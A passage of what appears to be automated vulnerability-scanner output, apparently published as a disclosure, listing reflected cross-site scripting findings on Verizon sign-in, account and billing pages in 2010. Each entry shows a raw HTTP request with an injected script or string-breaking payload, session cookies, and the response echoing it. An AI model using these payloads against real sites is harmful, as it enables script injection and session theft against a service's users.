Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA22V
Content-Type: text/html; charset=utf-8
Content-Length: 47366
Expires: Sat, 20 Nov 2010 02:33:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:33:56 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&UIDPWD=Invalid&WTNOnly=Y3eb64"><script>alert(1)</script>4317d0b7492" name="target">
...[SNIP]...

3.123. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The value of the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN request parameter is copied into the HTML document as plain text between tags. The payload 803f5<script>alert(1)</script>a7a0468d9ed was submitted in the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1803f5<script>alert(1)</script>a7a0468d9ed HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Encoding: gzip, deflate
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI; RegistrationApp=SessionId=fe2667e8-4e28-4de7-8250-68e0b90911ca; VZGEO=west
Host: www22.verizon.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 00:59:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:59:08 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:04:08 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47430


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1803f5<script>alert(1)</script>a7a0468d9ed" name="target">
...[SNIP]...

3.124. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The value of the 3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN request parameter is copied into the HTML document as plain text between tags. The payload 78e35<script>alert(1)</script>a713bc75061 was submitted in the 3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=178e35<script>alert(1)</script>a713bc75061 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA24V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 01:09:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:09:31 GMT
Connection: keep-alive
Set-Cookie: RegistrationApp=SessionId=00ac6571-3565-4f1f-9c9c-e471f00b0bd4; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f945525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:14:31 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47430


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=178e35<script>alert(1)</script>a713bc75061" name="target">
...[SNIP]...

3.125. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5db6f<script>alert(1)</script>d983fc34cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1&5db6f<script>alert(1)</script>d983fc34cd0=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Encoding: gzip, deflate
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI; RegistrationApp=SessionId=fe2667e8-4e28-4de7-8250-68e0b90911ca; VZGEO=west
Host: www22.verizon.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 01:03:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:03:14 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:08:14 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47433


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1&5db6f<script>alert(1)</script>d983fc34cd0=1" name="target">
...[SNIP]...

3.126. https://www22.verizon.com/foryourhome/GoFlow/MyVerizon/RegistrationBridge.aspx [Client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /foryourhome/GoFlow/MyVerizon/RegistrationBridge.aspx

Issue detail

The value of the Client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b116d"%3balert(1)//c8e1f41e796 was submitted in the Client parameter. This input was echoed as b116d";alert(1)//c8e1f41e796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=EFiOSTV-CHNL&Client=MYVERb116d"%3balert(1)//c8e1f41e796&getstarted=6hboupsell HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 22735
Expires: Sat, 20 Nov 2010 02:33:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:33:33 GMT
Connection: close
Set-Cookie: EOrdering=PN-DR-ENABLED=iVwfNps%2fXq8%3d&PROJNORTH-CLIENT=&WR58038_DC=efZHv8OIFvI%3d&HBXSOURCE=Z%2bMP4OJFy5%2fqmvWNgdEqqq8jhZx46tHx; domain=.verizon.com; path=/


<script language="javascript">    vzLogging_appName = "eOrdering";</script>

<script language="javascript" src="../Common/includes/js/pagetracker.js"></script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD
...[SNIP]...
<!--.net shutdown -->
           
               locationHref = locationHref + "&Client=" + "MYVERb116d";alert(1)//c8e1f41e796"
           

           location.href = locationHref + catHref;
           var appname = navigator.appName;
           if(appname != "Netscape")
           {
           
            var tempHTML = document.getElementById(Ctrl1).innerHTML;
       
...[SNIP]...

3.127. https://www22.verizon.com/foryourhome/MyAccount/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /foryourhome/MyAccount/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfa60"%3bf05a0d1a8b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cfa60";f05a0d1a8b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/MyAccount/?cfa60"%3bf05a0d1a8b6=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:48:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66445525d5f4f58455e445a4a423660;path=/
Content-Length: 128914

<!-- Vignette V6 Fri Nov 19 18:48:53 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
cument.cookie="MyVzCom=remopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/foryourhome/MyAccount/?cfa60";f05a0d1a8b6=1';
<!-- Vignette V6 Fri Nov 19 18:48:53 2010 -->
...[SNIP]...

3.128. https://www22.verizon.com/foryourhome/billview/PfbPage.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /foryourhome/billview/PfbPage.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9f30"%3b3e7ac830269 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9f30";3e7ac830269 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /foryourhome/billview/PfbPage.aspx?d9f30"%3b3e7ac830269=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; 